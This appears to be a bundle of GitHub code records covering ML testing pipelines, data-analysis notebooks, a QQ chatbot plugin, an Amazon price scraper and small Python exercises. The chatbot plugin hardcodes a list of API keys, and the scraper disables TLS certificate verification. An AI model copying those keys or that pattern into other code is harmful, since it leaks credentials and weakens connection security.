config.ckpt_path = os.path.join(hydra.utils.get_original_cwd(), config.ckpt_path)\n\n # Init lightning datamodule\n log.info(f\"Instantiating datamodule <{config.datamodule._target_}>\")\n datamodule: LightningDataModule = hydra.utils.instantiate(config.datamodule, config.data_dir)\n datamodule.setup(\"test\")\n\n # get the number of labels\n num_labels = len(datamodule.data_test.unique_labels)\n\n # Init lightning model\n log.info(f\"Instantiating model <{config.model._target_}>\")\n model: LightningModule = hydra.utils.instantiate(\n config.model,\n num_labels=num_labels,\n metrics=config.metrics,\n _recursive_=False, # for hydra (won't recursively instantiate criterion)\n )\n\n # Init lightning loggers\n logger: List[LightningLoggerBase] = []\n if \"logger\" in config:\n for _, lg_conf in config.logger.items():\n if \"_target_\" in lg_conf:\n log.info(f\"Instantiating logger <{lg_conf._target_}>\")\n logger.append(hydra.utils.instantiate(lg_conf))\n\n # Init lightning trainer\n log.info(f\"Instantiating trainer <{config.trainer._target_}>\")\n trainer: Trainer = hydra.utils.instantiate(config.trainer, logger=logger)\n\n # Log hyperparameters\n if trainer.logger:\n trainer.logger.log_hyperparams({\"ckpt_path\": config.ckpt_path})\n\n log.info(\"Starting testing!\")\n trainer.test(model=model, datamodule=datamodule, ckpt_path=config.ckpt_path)\n model.test_results\n\n # Let's do some analysis on the test results\n\n def convert_to_tokens(inputs: List, tokenizer: torch.nn.DataParallel) -> List:\n return tokenizer.convert_ids_to_tokens(inputs)\n\n def convert_to_labels(label: List, label_map: dict) -> List:\n return [label_map[l] if l in label_map else None for l in label]\n\n\n def contract_labels(inputs: List, labels: List, predictions: List):\n # check that all three list have the same the same length:\n assert len(inputs) == len(labels) == len(predictions) \n new_inputs = []\n new_labels = []\n new_predictions = []\n for input, label, prediction in zip(inputs, labels, predictions):\n if label is None:\n continue\n if input.startswith(\"##\"):\n new_inputs[-1] += input[2:]\n else:\n new_inputs.append(input)\n new_labels.append(label)\n new_predictions.append(prediction)\n return new_inputs, new_labels, new_predictions\n\n model.test_results['inputs'] = model.test_results.input_ids.apply(\n lambda x: convert_to_tokens(x[0], datamodule.data_test.tokenizer)\n )\n\n model.test_results['label'] = model.test_results.label.apply(\n lambda x: convert_to_labels(x[0], datamodule.data_test.ids_to_labels)\n )\n\n model.test_results['predictions'] = model.test_results.predictions.apply(\n lambda x: convert_to_labels(x[0], datamodule.data_test.ids_to_labels)\n )\n\n temp = model.test_results.apply(lambda row: contract_labels(row.inputs, row.label, row.predictions), axis=1)\n\n model.test_results = pd.DataFrame(temp.tolist(), columns=['inputs', 'label', 'predictions'])\n\n def colorize(inputs: List, labels: List, predictions: List) -> List:\n \"\"\"Colorize the input based on the results of the prediction.\"\"\"\n assert len(inputs) == len(labels) == len(predictions) \n color_inputs = []\n for input, label, prediction in zip(inputs, labels, predictions):\n if label == prediction:\n if label in [\"B-per\", \"I-per\"]:\n color_inputs.append(f\"[bold green]{input}[/bold green]\")\n else:\n color_inputs.append(input)\n else:\n if label in [\"B-per\", \"I-per\"]:\n color_inputs.append(f\"[bold red]{input}[/bold red]\")\n else:\n color_inputs.append(f\"[red]{input}[/red]\")\n return color_inputs\n\n # create colored inputs based on the results of the prediction\n model.test_results['color_inputs'] = model.test_results.apply(lambda row: colorize(row.inputs, row.label, row.predictions), axis=1)\n model.test_results['color_inputs'] = model.test_results['color_inputs'].apply(lambda x: ' '.join(x))\n\n # count the number of errors in each sentence and colorize the results\n model.test_results['errors'] = model.test_results.apply(lambda row: sum([label != predicion for label, predicion in zip(row.label, row.predictions)]), axis=1)\n model.test_results['errors'] = model.test_results['errors'].apply(lambda x: f\"[green]0[/green]\" if x == 0 else f\"[red]{x}[/red]\")\n\n # Create a table to make visual inspection of the results easier\n table = Table(title=\"Test data results\")\n table.add_column(\"Index\", style=\"cyan\", no_wrap=True)\n table.add_column(\"Results\", justify=\"left\", no_wrap=True)\n table.add_column(\"# of Errors\", justify=\"center\")\n\n model.test_results.apply(lambda row: table.add_row(str(row.name), row.color_inputs, str(row.errors)), axis=1)\n console = Console()\n console.print(table)\n\n print('Done!')\n","repo_name":"natephysics/event_lineup_extraction","sub_path":"src/testing_pipeline.py","file_name":"testing_pipeline.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2576015326","text":"import math\ndef dist(tuple1, tuple2, currdist=0):\n ans = round(currdist + math.sqrt(abs((tuple1[0] - tuple2[0])**2 + (tuple1[1] - tuple2[1])**2)), 4)\n print(ans)\n return ans\n \nbiglist = [(3.9,0),(4.1,0),(4.25,1),(3.75,1),(3.5,2),(4.5,2),(4.75,3),(3.25,3), (3,4), (5,4), (5.25, 5), (2.75,5), (2.5, 6), (5.5, 6)]\n\ncurrdist = 0\nfor i, currtup in enumerate(biglist):\n if i + 1 == len(biglist):\n break\n currdist = dist(currtup, biglist[i+1], currdist)","repo_name":"malcolmang/simple-lattice-gcode","sub_path":"New folder/extruderlength.py","file_name":"extruderlength.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29588575624","text":"import random\nimport probabilityHash as p\ndef simInsertions(numIndices, numInsertions):\n \"\"\"Assumes numIndices and numInsertions are positive ints\n Return 1 if there is a collision \"\"\"\n print('entro Inser')\n choices = range(numIndices)#list of possible indices\n used = []\n for i in range(numInsertions):\n print(used)\n hashVal = random.choice(choices)\n if hashVal in used:\n return 1\n else:\n used.append(hashVal)\n return 0\n\ndef finProb(numIndices, numInsertions,numTrials):\n collision=0\n for t in range(numTrials):\n collision+=simInsertions(numIndices,numInsertions)\n return collision/numTrials\n\n#modelo\nprint('Actual probability of a collision ',p.collisionProb(1000,50))\n#empirico\nprint('Estimate probability of a collision ',finProb(1000,50,10000))\n#modelo\nprint('Actual probability of a collision ',p.collisionProb(1000,200))\n#empirico\nprint('Estimate probability of a collision ',finProb(1000,200,10000))\n\"\"\"that's mean the hashTable has to be enormous to be useful?\nThis probability tell us little about the expected lookup time. The expected lookup tiem \ndepends upon the avergage length of the list implementing the buckets.\nAssuming a uniform distribution, this is the number of insertions/number of buckets'\"\"\"\n","repo_name":"stevenAnto/mitPythonIntro","sub_path":"IntroComputSciencProPy/statistic/simulatingHashTables.py","file_name":"simulatingHashTables.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30777434567","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\n\n# In[2]:\n\n\n#MovieLens의 영화 평점 데이터\n\n\n# In[3]:\n\n\npd.options.display.max_rows = 10\nunames = ['user_id', 'gender', 'age', 'occupation', 'zip']\nusers = pd.read_table('datasets/movielens/users.dat', sep='::',\n header=None, names=unames)\nrnames = ['user_id', 'movie_id', 'rating', 'timestamp']\nratings = pd.read_table('datasets/movielens/ratings.dat', sep='::',\n header=None, names=rnames)\nmnames = ['movie_id', 'title', 'genres']\nmovies = pd.read_table('datasets/movielens/movies.dat', sep='::',\n header=None, names=mnames)\n\n\n# In[7]:\n\n\nusers[:5]\n\n\n# In[5]:\n\n\nratings[:5]\n\n\n# In[6]:\n\n\nmovies[:5]\n\n\n# In[8]:\n\n\nratings\n\n\n# In[9]:\n\n\ndata = pd.merge(pd.merge(ratings, users), movies)\n\n\n# In[10]:\n\n\ndata\n\n\n# In[11]:\n\n\ndata.iloc[0]\n\n\n# In[12]:\n\n\nmean_ratings = data.pivot_table('rating', index='title',\n columns='gender', aggfunc='mean')\n\n\n# In[13]:\n\n\nmean_ratings[:5]\n\n\n# In[14]:\n\n\nratings_by_title = data.groupby('title').size()\n\n\n# In[15]:\n\n\nratings_by_title[:10]\n\n\n# In[16]:\n\n\nactive_titles = ratings_by_title.index[ratings_by_title >= 250]\n\n\n# In[17]:\n\n\nactive_titles\n\n\n# In[18]:\n\n\nmean_ratings = mean_ratings.loc[active_titles]\n\n\n# In[19]:\n\n\nmean_ratings\n\n\n# In[20]:\n\n\ntop_female_ratings = mean_ratings.sort_values(by='F', ascending=False)\n\n\n# In[21]:\n\n\ntop_female_ratings[:10]\n\n\n# In[22]:\n\n\n# 평점 차이 구하기\n\n\n# In[23]:\n\n\nmean_ratings['diff'] = mean_ratings['M'] - mean_ratings['F']\n\n\n# In[24]:\n\n\nsorted_by_diff = mean_ratings.sort_values(by='diff')\n\n\n# In[25]:\n\n\nsorted_by_diff[:10]\n\n\n# In[26]:\n\n\nsorted_by_diff[::-1][:10]\n\n\n# In[27]:\n\n\nrating_std_by_title = data.groupby('title')['rating'].std()\n\n\n# In[28]:\n\n\nrating_std_by_title = rating_std_by_title.loc[active_titles]\n\n\n# In[30]:\n\n\n# 평점 내림차순으로 Series 정렬\n\n\n# In[ ]:\n\n\nrating_std_by_title.sort_values(ascending=False)[:10]\n\n","repo_name":"jeongilpum/pythonData","sub_path":"data/MovieLens의 영화 평점 데이터.py","file_name":"MovieLens의 영화 평점 데이터.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21472143598","text":"# x=10\n# print(\"Bu bir denemedir\")\n# if x>5:\n# raise Exception(\"x 5 den büyük deger alamaz\")\n\n# def check_password(psw):\n# import re\n\n# if len(psw)<8:\n# raise Exception(\"Parola en az 7 karakter olmalıdır\")\n# elif not re.search(\"[a-z]\",psw):\n# raise Exception(\"parola küçük harf olmalıdır.\")\n# elif not re.search(\"[A-Z]\",psw):\n# raise Exception(\"parola büyük harf olmalıdır.\")\n# elif not re.search(\"[1-9]\",psw):\n# raise Exception(\"parola rakam içermelidir.\")\n# elif not re.search(\"[@$]\",psw):\n# raise Exception(\"parola alpha numeric karakter içermelidir\")\n\n# else:\n# print(\"Geçerli parola girişi sağlandı\") \n\n# password=\"1234567@1aA\"\n\n# try:\n# check_password(password)\n# except Exception as ex:\n# print(ex)\n# finally:\n# print(\"validation tamamlandı\") \n\n\nclass Person:\n def __init__(self,name,year):\n if len(name)>10:\n raise Exception(\"name alanı fazla karakter içeriyor\")\n else:\n self.name=name\np=Person(\"Fayikkkkkkk\",1998)\n","repo_name":"Fayikk/Work_To_Python","sub_path":"Error_Object_Create.py","file_name":"Error_Object_Create.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"tr","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"28173645","text":"l = []\ntmp_sc = set()\nfor _ in range(int(input())):\n name = input()\n score = float(input())\n\n l.append([name, score])\n tmp_sc.add(score)\n\ntmp_sc = sorted(list(tmp_sc))\nans = []\nfor i in l:\n if tmp_sc[1] == i[1]:\n ans.append(i[0])\nans.sort()\nfor j in ans:\n print(j)\n","repo_name":"mizutaninaoki/AtCoderPractice","sub_path":"hacker_rank/Nested Lists.py","file_name":"Nested Lists.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10668406887","text":"import os\nimport sys\nfrom test.testutil import parse_args\nfrom runners.test_runner import TestRunner\nimport train_unet as unet\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))\n\ntest = dict(\n data=dict(\n dataset=dict(\n type=unet.dataset_type,\n root=unet.dataset_root,\n imglist_name='val.txt',\n multi_label=False,\n ),\n transforms=unet.inference['transforms'],\n sampler=dict(\n type='DefaultSampler',\n ),\n dataloader=dict(\n type='DataLoader',\n samples_per_gpu=4,\n workers_per_gpu=4,\n shuffle=False,\n drop_last=False,\n pin_memory=True,\n ),\n ),\n)\n\n\ndef main():\n args = parse_args()\n out = os.path.join(unet.root_out, 'unet')\n os.makedirs(out, exist_ok=True)\n runner = TestRunner(unet.nclasses, out, False, True, test, unet.inference)\n runner.load_from_checkpoint(args.checkpoint)\n runner()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shivkhattar/Semantic-Segmentation","sub_path":"test_unet.py","file_name":"test_unet.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13183995252","text":"\nimport json,random\nfrom typing import Optional\n\nimport aiohttp\nfrom aiocqhttp.message import escape\nfrom nonebot import on_command, CommandSession\nfrom nonebot import on_natural_language, NLPSession, IntentCommand\nfrom nonebot.helpers import context_id, render_expression\n\nfrom .what_trash import trash_sorter\n\n# 定义无法获取图灵回复时的“表达(Expression)”\nEXPR_DONT_UNDERSTAND = (\n '我现在还不太明白你在说什么呢,但没关系,以后的我会变得更强呢!',\n '我有点看不懂你的意思呀,可以跟我聊些简单的话题嘛',\n '其实我不太明白你的意思……',\n '抱歉哦,我现在的能力还不能够明白你在说什么,但我会加油的~'\n)\n\nkeys_list = [\"780ac68dd9ca4ba58374b0f3db1a9b18\",\"6a26db99154248809f0b3b750d5098c6\",\n \"b6aab09b04ef41898b85f60e18b69940\", \"6d73e92a7e594687ad8f268b4cb3d2f4\",\n \"ae7caaf2308a40179476062a857615e4\",\"8b5f30f5caed4196a21ab0887eef1858\",\n \"b424b32b20d9433eb4109c1b07d51bcc\",\"e2c43a8914eb4c98b35dda132cad5244\",\n \"aba3823f0b8945cc9edaff7df1219bf5\",\"cd19cd742df240e287caa0e366472c89\"]\n# 注册一个仅内部使用的命令,不需要 aliases\n@on_command('tuling')\nasync def tuling(session: CommandSession):\n # 获取可选参数,这里如果没有 message 参数,命令不会被中断,message 变量会是 None\n message = session.state.get('message')\n\n # 通过封装的函数获取图灵机器人的回复\n reply = await call_tuling_api(session, message)\n\n def if_at():\n _at = [True,False,False,False]\n return random.choice(_at)\n if reply:\n # 如果调用图灵机器人成功,得到了回复,则转义之后发送给用户\n # 转义会把消息中的某些特殊字符做转换,以避免 酷Q 将它们理解为 CQ 码\n await session.send(escape(reply),at_sender=if_at())\n else:\n # 如果调用失败,或者它返回的内容我们目前处理不了,发送无法获取图灵回复时的“表达”\n # 这里的 render_expression() 函数会将一个“表���”渲染成一个字符串消息\n await session.send(render_expression(EXPR_DONT_UNDERSTAND),at_sender=if_at())\n\n\n@on_natural_language\nasync def _(session: NLPSession):\n # 以置信度 60.0 返回 tuling 命令\n # 确保任何消息都在且仅在其它自然语言处理器无法理解的时候使用 tuling 命令\n # print(session.ctx['message'])# 消息内容\n # print(session.ctx)# 有些人会报错 unicode Encode Error\n msg = str(session.ctx['message'])\n msg_type = str(session.ctx['message_type'])\n to_me = str(session.ctx['to_me'])\n # print('-------------------------------')\n # print(msg,type(msg))\n # print(len(msg),msg[1:])\n # print('-------------------------------')\n\n if (len(msg) > 5) and ('什么垃圾' in msg[1:]):\n print('========')\n us_data = await trash_sorter(msg)\n if msg_type == 'group' and to_me == 'True':\n # print(2222222,str(session.ctx['user_id']))\n await session.send(us_data,at_sender=True)\n pass\n else:\n await session.send(us_data)\n pass\n else:\n return IntentCommand(60.0, 'tuling', args={'message': session.msg_text})\n\n\nasync def call_tuling_api(session: CommandSession, text: str) -> Optional[str]:\n # 调用图灵机器人的 API 获取回复\n\n if not text:\n return None\n\n url = 'http://openapi.tuling123.com/openapi/api/v2'\n\n # 构造请求数据\n payload = {\n 'reqType': 0,\n 'perception': {\n 'inputText': {\n 'text': text\n }\n },\n 'userInfo': {\n # 'apiKey': session.bot.config.TULING_API_KEY,\n 'apiKey': random.choice(keys_list),\n 'userId': context_id(session.ctx, use_hash=True)\n }\n }\n\n group_unique_id = context_id(session.ctx, mode='group', use_hash=True)\n if group_unique_id:\n payload['userInfo']['groupId'] = group_unique_id\n\n try:\n # 使用 aiohttp 库发送最终的请求\n async with aiohttp.ClientSession() as sess:\n async with sess.post(url, json=payload) as response:\n if response.status != 200:\n # 如果 HTTP 响应状态码不是 200,说明调用失败\n return None\n\n resp_payload = json.loads(await response.text())\n if resp_payload['results']:\n for result in resp_payload['results']:\n if result['resultType'] == 'text':\n # 返回文本类型的回复\n return result['values']['text']\n except (aiohttp.ClientError, json.JSONDecodeError, KeyError):\n # 抛出上面任何异常,说明调用失败\n return None","repo_name":"65wu/robot_hao","sub_path":"haohao/awesome/plugins/tuling123.py","file_name":"tuling123.py","file_ext":"py","file_size_in_byte":4879,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33447517771","text":"import requests\nimport re\nimport datetime\nimport pymongo\n\nfrom bs4 import BeautifulSoup\n\n\ndef extract_url(url):\n\n # This function takes an Amazon India URL such as:\n # https://www.amazon.in/Samsung-Galaxy-M30-Gradation-Blue/dp/B07HGJJ58K/ref=br_msw_pdt-1?_encoding=UTF8&smid=A1EWEIV3F4B24B&pf_rd_m=A1VBAL9TL5WCBF&pf_rd_s=&pf_rd_r=VFJ98F93X80YWYQNR3GN&pf_rd_t=36701&pf_rd_p=9806b2c4-09c8-4373-b954-bae25b7ea046&pf_rd_i=desktop”\n # and converts them to shorter URL\n # https://www.amazon.in/dp/B07HGJJ58K which is more manageable. Also if the URL is not valid www.amazon.in URL then it would return a None\n\n if url.find('www.amazon.in') != -1:\n index = url.find('/dp/')\n \n if index != -1:\n index2 = index + 14\n url = 'https://www.amazon.com' + url[index:index2]\n\n else:\n index = url.find('/gp/')\n\n if index != -1:\n index2 = index + 22\n url = 'https://www.amazon.com' + url[index:index2]\n\n else:\n url = None\n\n else:\n url = None\n\n return url\n\n\ndef get_converted_price(price):\n\n # stripped_price = price.strip(\"$ ,\")\n # replaced_price = stripped_price.replace(',', '')\n # converted_price = float(replaced_price)\n\n converted_price = float(re.sub(r'[^\\d.]', '', price))\n\n return converted_price\n\n\ndef get_product_details(url):\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 \"\n \"(KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\"\n }\n details = {\n \"name\": \"\",\n \"price\": 0,\n \"deal\": True,\n \"url\": \"\"\n }\n\n _url = extract_url(url)\n if _url == \"\":\n details = None\n\n else:\n page = requests.get(url, headers=headers, verify=False)\n soup = BeautifulSoup(page.content, 'html5lib')\n\n title = soup.find(id='productTitle')\n price = soup.find(id='priceblock_dealprice')\n if price is None:\n price = soup.find(id='priceblock_ourprice')\n details['deal'] = False\n\n if title is not None and price is not None:\n details['name'] = title.get_text().strip()\n details['price'] = get_converted_price(price.get_text())\n details['url'] = _url\n else:\n return None\n\n return details\n\n\ndef add_product_detail(details):\n\n new = db['products']\n ASIN = details['url'][len(details['url'])-10:]\n details['date'] = datetime.datetime.utcnow()\n\n try:\n\n new.update_one(\n {\n 'asin': ASIN\n },\n {\n '$set': {\n 'asin': ASIN\n },\n '$push': {\n 'details': details\n }\n },\n upsert=True\n )\n return True\n\n except Exception as identifier:\n\n print(identifier)\n return False\n\ndef get_product_history(asin):\n\n pass\n\n\nif __name__ == '__main__':\n\n client = pymongo.MongoClient('mongodb://localhost:27017/')\n db = client['amazon']\n\n print(get_product_details(\"https://www.amazon.com/Samsung-Factory-Unlocked-Warranty-Midnight/dp/B07HR4FVDG/ref=sr_1_1?keywords=samsung+galaxy+note+9&qid=1566209728&s=gateway&sr=8-1\"))\n","repo_name":"degru82/datasci_by_casestudy","sub_path":"ep03_amazon/amazon_price_tracker.py","file_name":"amazon_price_tracker.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3891632459","text":"import re\n\nimport pydot\n\n\nclass Morph:\n def __init__(self, surface, base, pos, pos1):\n self.surface = surface\n self.base = base\n self.pos = pos\n self.pos1 = pos1\n\n def __str__(self):\n return \"surface:{}\\tbase:{}\\tpos:{}\\tpos1:{}\".format(self.surface, self.base, self.pos, self.pos1)\n\n\nclass Chunk:\n def __init__(self, dst=-1):\n self.morphs = []\n self.dst = dst\n self.srcs = []\n\n def __str__(self):\n return \"{}\\tsrcs:{}\\tdst:{}\".format(self.surface, self.srcs, self.dst)\n\n @property\n def surface(self):\n morphs = [morph for morph in self.morphs if morph.pos != \"記号\"]\n return \"\".join(map(lambda morph: morph.surface, morphs))\n\n @property\n def has_depend(self):\n return self.dst != -1\n\n def has_pos(self, pos):\n return any([morph.pos == pos for morph in self.morphs])\n\n def get_morphs_by_pos(self, pos):\n morphs = [morph for morph in self.morphs if morph.pos == pos]\n if morphs:\n return morphs[0]\n return \"\"\n\n def get_morphs_surfaces_by_pos(self, pos):\n return [(morph.base, self.surface) for morph in self.morphs if morph.pos == pos]\n\n @property\n def has_sahen_wo(self):\n return bool(self.get_sahen_wo())\n\n def get_sahen_wo(self):\n for i, morph in enumerate(self.morphs[:-1]):\n if morph.pos == \"名詞\" and morph.pos1 == \"サ変接続\":\n next_morph = self.morphs[i + 1]\n if next_morph.pos == \"助詞\" and next_morph.surface == \"を\":\n return morph.surface + \"を\"\n return \"\"\n\n def path_to_root(self, sentence):\n return [self] + sentence[self.dst].path_to_root(sentence) if self.has_depend else [self]\n # path = []\n # chunk = self\n # while chunk.has_depend:\n # path.append(chunk.surface)\n # chunk = sentence[chunk.dst]\n # path.append(chunk.surface)\n # return path\n\n\ndef dependencies(filename=\"../data/neko.txt.cabocha\"):\n exp = re.compile(\"^\\*\\s(?P\\d+)\\s(?P-?\\d+)D\")\n chunks = []\n chunk = Chunk()\n\n with open(filename) as lines:\n for line in lines:\n if line == \"EOS\\n\":\n if chunk.morphs:\n chunks.append(chunk)\n if chunks:\n for i, chunk in enumerate(chunks):\n if chunk.dst > -1:\n chunks[chunk.dst].srcs.append(i)\n yield chunks\n chunk = Chunk()\n chunks = []\n else:\n if line[0] == \"*\":\n dst = int(exp.search(line).group('dst'))\n if chunk.morphs:\n chunks.append(chunk)\n chunk = Chunk(dst)\n else:\n line = line.replace(\"\\t\", \",\")\n values = line.split(\",\")\n chunk.morphs.append(Morph(\n values[0],\n values[7],\n values[1],\n values[2]\n ))\n raise StopIteration\n\n\ndef graph_from_edges(edges):\n graph = pydot.Dot(graph_type='digraph')\n\n for edge in edges:\n id1, label1, id2, label2 = str(edge[0][0]), str(edge[0][1]), str(edge[1][0]), str(edge[1][1])\n\n graph.add_node(pydot.Node(id1, label=label1))\n graph.add_node(pydot.Node(id2, label=label2))\n\n graph.add_edge(pydot.Edge(id1, id2))\n\n return graph\n\n\nclass Dependant:\n def __init__(self, predicate):\n self.subject = \"\"\n self.predicate = predicate\n self.object = \"\"\n\n def set_subject(self, subject):\n self.subject = subject\n\n def set_object(self, object):\n self.object = object\n\n def has_all_attribute(self):\n return all([bool(self.subject), bool(self.predicate), bool(self.object)])\n","repo_name":"Cain96/nlp100","sub_path":"chap5/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34857271556","text":"from .models import Graditude, User \n\ndef getUserGrats():\n name = 'Adi'\n user = User.objects.get(pk=1)\n\n #normally, we would query for the active user and a date range\n all_entries = Graditude.objects.all()\n\n txt = ''\n for entry in all_entries:\n txt = txt + entry\n \n","repo_name":"abigail432/daily_gratitude","sub_path":"daily_gratitude/daily_grat/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11062370727","text":"# The pipeline API requires imports.\nfrom zipline.api import attach_pipeline, pipeline_output, update_universe\nfrom zipline.pipeline import Pipeline\nfrom zipline.pipeline.data import USEquityPricing\nfrom zipline.pipeline.factors import SimpleMovingAverage\n\ndef initialize(context):\n\n # Create, register and name a pipeline in initialize.\n pipe = Pipeline()\n attach_pipeline(pipe, 'example')\n\n # Construct a simple moving average factor and add it to the pipeline.\n sma_short = SimpleMovingAverage(inputs=[USEquityPricing.close], window_length=10)\n pipe.add(sma_short, 'sma_short')\n\n # Set a screen on the pipelines to filter out securities.\n pipe.set_screen(sma_short > 1.0)\n\n\ndef before_trading_start(context, data):\n # Pipeline_output returns the constructed dataframe.\n output = pipeline_output('example')\n\n # Select and update your universe.\n context.my_universe = output.sort('sma_short', ascending=False).iloc[:200]\n update_universe(context.my_universe.index)\n\n\ndef handle_data(context, data):\n log.info(\"\\n\" + str(context.my_universe.head(5)))\n","repo_name":"mequanta/z-runner","sub_path":"examples/quanto/using_pipelines.py","file_name":"using_pipelines.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10152709675","text":"import cv2\n# import src.cv.makeup.utils as mutils\n\n# mutils.start_cam()\n# mutils.enable_makeup('eyeshadow', 34, 74, 162, .7)\n# mutils.enable_makeup('blush', 87, 36, 51, .5)\n# mutils.enable_makeup('eyeliner', 142, 30, 29, .5)\n# mutils.enable_makeup('lipstick', 142, 30, 29, gloss=False, lipstick_type='soft')\n# # mutils.enable_makeup('concealer', 200, 10, 20, 1)\n# # mutils.enable_makeup('foundation', 255, 253, 208, .3)\n# while True:\n# cv2.imshow(\"Frame\", mutils.apply_makeup_video())\n# key = cv2.waitKey(1) & 0xFF\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom src.cv.simulation.apply_foundation import Foundation\nfrom src.settings import SHAPE_68_PATH, SHAPE_81_PATH\nimport dlib\n\ndetector = dlib.get_frontal_face_detector()\nface_pose_predictor_68 = dlib.shape_predictor(SHAPE_68_PATH)\nface_pose_predictor_81 = dlib.shape_predictor(SHAPE_81_PATH)\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n x_68 = []\n y_68 = []\n x_81 = []\n y_81 = []\n\n # img = cv2.imread('face.jpg')\n _, img = cap.read()\n\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n frame = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n face = detector(gray, 0)[0]\n\n pose_landmarks = face_pose_predictor_68(gray, face)\n\n for i in range(68):\n x_68.append(int(((pose_landmarks.part(i).x))))\n y_68.append(int(((pose_landmarks.part(i).y))))\n\n\n a = np.min(x_68[36:41])\n b = np.max(x_68[36:41])\n c = np.min(y_68[36:41])\n d = np.max(y_68[36:41])\n\n img = img[c:d, a:b]\n\n # ret,thresh1 = cv2.threshold(gray, 80, 255, cv2.THRESH_BINARY)\n\n # pose_landmarks = face_pose_predictor_81(gray, face)\n # for i in range(81):\n # x_81.append(int(((pose_landmarks.part(i).x))))\n # y_81.append(int(((pose_landmarks.part(i).y))))\n\n # y_68 = np.array(y_68)\n\n # y_68 += 10\n\n # foundation = Foundation()\n\n # res = foundation.apply_foundation(frame, x_81, y_81, x_68, y_68, 255, 253, 208, 81, 81, 1)\n\n # cv2.imshow('frame', cv2.cvtColor(res, cv2.COLOR_RGB2BGR))\n # cv2.waitKey(0)\n\n # fig, (ax1, ax2) = plt.subplots(1, 2)\n # xs, ys = np.r_[x_68[1:17], x_81[68:81]], np.r_[y_68[1:17], y_81[68:81]]\n\n # for x, y in zip(x_68, y_68):\n # img = cv2.circle(img, (x, y), 1, (0, 0, 255), -1)\n\n # img = img[np.c_[x_68[36:42], y_68[36:42]]]\n\n\n cv2.imshow('frame', img)\n key = cv2.waitKey(1) & 0xFF\n # cv2.waitKey(0)\n # ax1.scatter(y_68[1:17], y_81[68:81])","repo_name":"fazixa/VirtualMirror-Server","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30817176696","text":"#%% Change working directory from the workspace root to the ipynb file location. Turn this addition off with the DataScience.changeDirOnImportExport setting\nimport os\ntry:\n\tos.chdir(os.path.join(os.getcwd(), 'homework'))\n\tprint(os.getcwd())\nexcept:\n\tpass\n#%% [markdown]\n# # 常用的 DataFrame 操作\n# * merge / transform\n# * subset\n# * groupby\n\n#%%\n# Import 需要的套件\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nget_ipython().magic('matplotlib inline')\n\n\n#%%\n# 設定 data_path\ndir_data = './data/'\n\n#%%\nf_app = os.path.join(dir_data, 'application_train.csv')\nprint('Path of read in data: %s' % (f_app))\napp_train = pd.read_csv(f_app)\n\n#%% [markdown]\n# ## 作業\n# 1. 請將 app_train 中的 CNT_CHILDREN 依照下列規則分為四組,\n# 並將其結果在原本的 dataframe 命名為 CNT_CHILDREN_GROUP\n# * 0 個小孩\n# * 有 1 - 2 個小孩\n# * 有 3 - 5 個小孩\n# * 有超過 5 個小孩\n# \n# 2. 請根據 CNT_CHILDREN_GROUP 以及 TARGET,列出各組的平均 AMT_INCOME_TOTAL,並繪製 baxplot\n# 3. 請根據 CNT_CHILDREN_GROUP 以及 TARGET,對 AMT_INCOME_TOTAL 計算 [Z 轉換](https://en.wikipedia.org/wiki/Standard_score) 後的分數\n\n#%%\n# play around with pd.cut\npd.cut(np.array([1, 7, 5, 4, 6, 3]), 3)\npd.cut(np.array([1, 7, 5, 4, 6, 3]), [0,3,7])\npd.cut(np.array([1, 7, 5, 4, 6, 3]), [0,3,7], False)\n\n#%%\n#1\ncut_rule = [-0.1, 0, 2, 5, float(\"inf\")]\nlabels = [\"a\",\"b\",\"c\",\"d\"]\napp_train['CNT_CHILDREN_GROUP'] = pd.cut(app_train['CNT_CHILDREN'].values, cut_rule, include_lowest=True, labels=labels)\napp_train['CNT_CHILDREN_GROUP'].value_counts()\n\n\n#%%\n#2-1\ngrp = ['CNT_CHILDREN_GROUP']\ngrouped_df = app_train.groupby(grp)['AMT_INCOME_TOTAL']\ngrouped_df.mean()\n\n\n#%%\n#2-2\nplt_column = 